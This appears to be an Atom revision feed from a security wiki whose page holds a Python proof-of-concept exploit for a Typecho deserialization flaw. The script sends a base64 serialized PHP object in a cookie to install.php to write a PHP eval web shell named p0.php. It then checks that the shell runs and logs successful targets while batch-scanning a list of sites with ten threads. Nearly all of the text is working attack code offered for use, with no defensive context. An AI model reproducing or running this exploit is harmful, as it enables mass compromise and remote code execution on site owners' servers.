https://pwnwiki.com/index.php?action=history&feed=atom&title=Typecho%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E
Typecho反序列化漏洞 - Revision history
2026-04-21T03:38:15Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Typecho%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E&diff=1450&oldid=prev
Pwnwiki: Created page with "==POC== <pre> #/usr/bin/env python # -*- coding: UTF-8 -*- import getopt,sys import requests import sys import string import time import threading class check(threading.Threa..."
2021-04-10T05:14:18Z
<p>Created page with "==POC== <pre> #/usr/bin/env python # -*- coding: UTF-8 -*- import getopt,sys import requests import sys import string import time import threading class check(threading.Threa..."</p>
<p><b>New page</b></p><div>==POC==<br />
<pre><br />
#/usr/bin/env python<br />
# -*- coding: UTF-8 -*-<br />
import getopt,sys<br />
import requests<br />
import sys<br />
import string<br />
import time<br />
import threading<br />
<br />
class check(threading.Thread): <br />
def __init__(self, url, sem):<br />
super(check, self).__init__() #继承threading类的构造方法,python3的写法super().__init__()<br />
self.url = url<br />
self.sem = sem<br />
<br />
def run(self):<br />
headers = {<br />
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0',<br />
'Referer': self.url,<br />
'cookie': "__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6NDp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMjoiAFR5cGVjaG9fRmVlZABfY2hhcnNldCI7czo1OiJVVEYtOCI7czoxOToiAFR5cGVjaG9fRmVlZABfbGFuZyI7czoyOiJ6aCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NTc6ImZpbGVfcHV0X2NvbnRlbnRzKCdwMC5waHAnLCAnPD9waHAgQGV2YWwoJF9QT1NUW3AwXSk7Pz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6NzoidHlwZWNobyI7fQ=="<br />
}<br />
try:<br />
reqs=s.get(self.url,timeout=3,headers=headers,allow_redirects=False)<br />
#print(reqs.status_code),<br />
except IOError: #如果网站打不开将输出fail<br />
print("time out 1")<br />
urls=self.url+"/p0.php"<br />
urlsss=self.url+"/install.php?finish=1"<br />
payloads={'p0':'echo "sectest";'}<br />
try:<br />
reqss=s.post(urls,allow_redirects=False,timeout=3,data=payloads)#测试是否文件创建成功<br />
body=reqss.text<br />
if body.find('sectest')!=-1:<br />
print("web is success----->>>>>>"+self.url)<br />
with open("./success.txt", "a+") as f1:<br />
f1.write(self.url + "\n")<br />
else: <br />
print("web is fail-------->>>>>>"+self.url)<br />
print('\n')<br />
except IOError: #如果网站打不开将输出fail<br />
print("time out 2")<br />
self.sem.release()<br />
<br />
if __name__ == '__main__':<br />
reload(sys)#同下解决中文乱码<br />
sys.setdefaultencoding('utf-8')#解决中文乱码<br />
f = open("./1.txt")#打开批量扫描的网站文件<br />
s=requests.Session()<br />
sem = threading.Semaphore(10) #最大线程数为10个<br />
for line in f.readlines():#读取每一行的网站<br />
line=line.strip('\n')#消去换行<br />
url=line#每行的网站赋值给url<br />
host_thread = check(url,sem)<br />
host_thread.start()#执行check()的执行函数<br />
</pre></div>
Pwnwiki